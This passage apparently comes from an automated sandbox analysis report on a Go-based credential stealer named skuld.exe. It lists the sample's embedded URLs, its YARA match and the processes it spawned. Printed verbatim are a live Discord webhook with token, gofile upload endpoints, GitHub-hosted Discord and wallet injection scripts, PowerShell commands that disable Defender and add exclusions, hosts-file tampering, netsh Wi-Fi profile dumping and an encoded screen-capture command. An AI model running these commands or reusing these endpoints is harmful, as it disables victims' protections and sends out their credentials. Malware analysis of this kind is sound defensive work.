                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://avatars.githubusercontent.com/u/145487845?v=4
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://avatars.githubusercontent.com/u/145487845?v=4sqlite:
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00011A000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1348329531148079104/1349316345950503014/Display_1.png?ex=67d2
                        Source: powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://discord.com/api/v8/guilds/too
                        Source: SecurityHealthSystray.exe.0.drString found in binary or memory: https://discord.com/api/v9/users/
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://discord.com/api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0Sh
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://discord.gg/release
                        Source: powershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterP
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://go.dev/issue/66821):
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://go.dev/pkg/crypto/rsa#hdr-Minimum_key_size)b3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120
                        Source: powershell.exe, 0000000D.00000002.1594297796.000001CAE037D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C000054000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://images-ext-1.discordapp.net/external/w7GYH8eczcCraeHx2lLq9j1gTDZzM2VBw5ALhQdbZvY/%3Fv%3D4/ht
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1348329531148079104/1349316345950503014/Display_1.png?ex=67
                        Source: powershell.exe, 0000000D.00000002.1724018024.000001CAEF230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1724018024.000001CAEF371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1594297796.000001CAE0B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00011A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&se
                        Source: powershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgXX
                        Source: skuld.exe, SecurityHealthSystray.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.jsrange
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C7A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.BoEX37k-iQhx
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C7A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bKxBjSHff0w5
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.0qLVhD3otCFX
                        Source: skuld.exe, 00000000.00000002.2753158867.0000027D65247000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                        Source: skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: skuld.exe, 00000000.00000002.2753158867.0000027D65247000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Yara detected Go Stealer
                        Source: Yara matchFile source: skuld.exe, type: SAMPLE
                        Source: Yara matchFile source: Process Memory Space: skuld.exe PID: 7148, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\skuld.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess Stats: CPU usage > 24%
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: Commandline size = 3614
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: Commandline size = 3614Jump to behavior
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winEXE@34/24@5/5
                        Source: C:\Users\user\Desktop\skuld.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Users\user\Desktop\skuld.exeMutant created: \Sessions\1\BaseNamedObjects\Global\3575651c-bb47-448e-a514-22865732bbc
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
                        Source: C:\Users\user\Desktop\skuld.exeFile created: C:\Users\user\AppData\Local\Temp\commonfiles-tempJump to behavior
                        Source: skuld.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
                        Source: C:\Users\user\Desktop\skuld.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: skuld.exe, 00000000.00000002.2747898604.0000027D63A70000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2746123468.0000027D63583000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: skuld.exeVirustotal: Detection: 24%
                        Source: skuld.exeString found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoneduse of closed network connection: day-of-year does not match dayNtWow64QueryInformationProcess64go package net: hostLookupOrder(invalid VaList argument type: %Tcrypto/aes: input not full blockcrypto/cipher: counter decreased" not supported for cpu option "chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largetls13: label or context too longmime: expected token after slashinitial table capacity too largeunexpected character, want colonsubtle.XORBytes: invalid overlapecdsa: internal error: r is zeroecdsa: internal error: s is zeroed25519: bad public key length: crypto/rsa: public key missing Nx509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failuremlkem: invalid ciphertext lengthcrypto/ecdh: invalid private keyinput overflows the modulus sizechacha20: invalid buffer overlap-DisableIntrusionPreventionSystemAppData\Roaming\Waterfox\ProfilesAppData\Roaming\K-Meleon\ProfilesAppData\Local\DCBrowser\User Data^(D|A|9)[a-km-zA-HJ-NP-Z1-9]{33}$[Join Server](https://discord.gg/release of handle with refcount 0too many levels of symbolic linksInitializeProcThreadAttributeListbytes.Buffer.Grow: negative countinsufficient memory for aggregatecrypto/des: output not full blockindefinite length found (not DER)struct contains unexported fieldsfailed to alloc global memory: %wpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %q142108547152020037174224853515625710542735760100185871124267578125CryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWreflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length sync: RUnlock of unlocked RWMutexskip everything and stop the walkslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert run
                        Source: skuld.exeString found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoneduse of closed network connection: day-of-year does not match dayNtWow64QueryInformationProcess64go package net: hostLookupOrder(invalid VaList argument type: %Tcrypto/aes: input not full blockcrypto/cipher: counter decreased" not supported for cpu option "chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largetls13: label or context too longmime: expected token after slashinitial table capacity too largeunexpected character, want colonsubtle.XORBytes: invalid overlapecdsa: internal error: r is zeroecdsa: internal error: s is zeroed25519: bad public key length: crypto/rsa: public key missing Nx509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failuremlkem: invalid ciphertext lengthcrypto/ecdh: invalid private keyinput overflows the modulus sizechacha20: invalid buffer overlap-DisableIntrusionPreventionSystemAppData\Roaming\Waterfox\ProfilesAppData\Roaming\K-Meleon\ProfilesAppData\Local\DCBrowser\User Data^(D|A|9)[a-km-zA-HJ-NP-Z1-9]{33}$[Join Server](https://discord.gg/release of handle with refcount 0too many levels of symbolic linksInitializeProcThreadAttributeListbytes.Buffer.Grow: negative countinsufficient memory for aggregatecrypto/des: output not full blockindefinite length found (not DER)struct contains unexported fieldsfailed to alloc global memory: %wpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %q142108547152020037174224853515625710542735760100185871124267578125CryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWreflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length sync: RUnlock of unlocked RWMutexskip everything and stop the walkslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert run
                        Source: skuld.exeString found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
                        Source: C:\Users\user\Desktop\skuld.exeFile read: C:\Users\user\Desktop\skuld.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\skuld.exe "C:\Users\user\Desktop\skuld.exe"
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\skuld.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABT
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9F3.tmp" "c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP"
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\skuld.exeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get NameJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
